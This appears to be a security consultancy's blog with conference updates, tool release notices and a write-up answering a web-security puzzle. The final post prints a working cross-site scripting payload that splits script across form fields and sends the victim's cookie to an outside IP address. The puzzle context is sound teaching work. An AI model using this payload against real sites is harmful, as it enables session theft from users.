Grey bar Blue bar
Share this:

Sun, 28 Dec 2008

... Scrapy...

(an open source web crawling and screen scraping framework written in Python..)

i promised deels i wld stay off the interwebs for a few days, which means my quick stops are filling up my bookmarks list..

This looks worth checking out.. http://dev.scrapy.org/

/mh

Mon, 30 Jul 2007

BlackHat Progress Report

(always wanted to say that!)

2 SensePost Training sessions are over, and as i type The weekday sessions are at about 50%. Feedback so far has been pretty cool and its been fun to meet new people / bump into some old friends..

The next "biggie" on the horizon is Wednesdays talk.. We have had a fair bit of interest so far and even though the slot has some stiff competition its seems like all will be well :). The talk should be interesting to developers, pen-testers and even just people with a vague interest in see'ing cool stuff.. Marco has been adding functionality to "squeeza" like a demon and as it stands its probably the only SQL Injection tool i know that will allow (file downloads, arb sql queries, database mining) all purely in T-Sql over a variety of transport channels (dns, error messages, timing). We will post the link to it for download just before we talk..

If you are at the briefings, catch us on Wednesday @ 11h15 in the Tiberius Ballroom (3+4+7+8) (that beeeeg!) :>

Till then, heres the summary of our about:us slide

marc-and-h.jpg
"
/mh

Suru version 1.2 Beta

Suru version 1.2 beta is a fairly comprehensive upgrade to Suru, our MITM assessment tool.

Suru version 1.2 comes with a number of bug fixes and enhancements, including the following:

- Support for upstream proxy servers with basic auth. - Request timing - Highlighting of requests in both the request editor and the browser - Enhanced sorting of requests - Neater request and fuzz result lists

Suru version 1.2 Beta can be downloaded from http://www.sensepost.com/research/suru

This is a beta version, so we'd really appreciate it if any bugs discovered can be forwarded to research@sensepost.com

Regards,

The SensePost research team.

Fri, 27 Jul 2007

BlackHat, DefCon, Las Vegas

Ok.. so the 2nd plane with SensePost'ers has touched down in LasVegas and the first cheeze-pizza from the caesars food court has been consumed.. So little changes in caesars that it always adds to the surreal feeling that lasts for the entire stay..

We will be in the training rooms over the weekend, and during the week, and will then give our bh-talk, before moving to defcon for the talk there..

in between, as usual its a chance to meet old friends, make new ones and get sun-burnt! Grab us if you see us, and we can grab coffee/beer/chocolate-milk..

I'd like to promise that we will blog interesting talks.. but in the normal blackhat/defcon madness, it will probably only happen when we get back home.. instead i promise to try, so watch this space (always wanted to say that!)

/mh

Tue, 24 Jul 2007

QoW 1 answered; Qow 2 released

A little while back we published our first public QoW for your abuse and enjoyment, and the time to close it is .......... now. The new QoW is available here. Thanks for the efforts; we received a fair number of answers and are still figuring out how to go about recording your submissions. For now, we'll publish the first correct answer, and discuss the answer in brief. Over to Haroon:

Jeremiah Grossman was the first correct answer, with valiant attempts from many others.. Acceptable solutions involved either the use of JavaScript / HTML comments to allow our injection to span multiple lines (or really really small urls :>)

An additional bonus for the attacker was that the form would accept as many name/value pairs submitted and returns them in the table allowing us to add variables forever..

original solution was therefore to submit:

http://qow.sensepost.com/cgi-bin/qow1/qow1?
name=<script>a='"http://'/*
&
address1=*/b='168.210.134.1/'/*
&
address3=*/c='?"+document'/*
&
moo1=*/d='.cookie'/*
&
moo2=*/f='document.location='/*
&
moo3=*/eval(f+a+b+c+d)/*
&
moo4=*/</script>
Effectively we build our JS command so that it fits into the imposed char limits, and use eval() eventually to pull them all together..

In our example we use it for a simple document.location to move off the cookie, but at that point the world is your oyster..

Ah well.. on with the show.. :>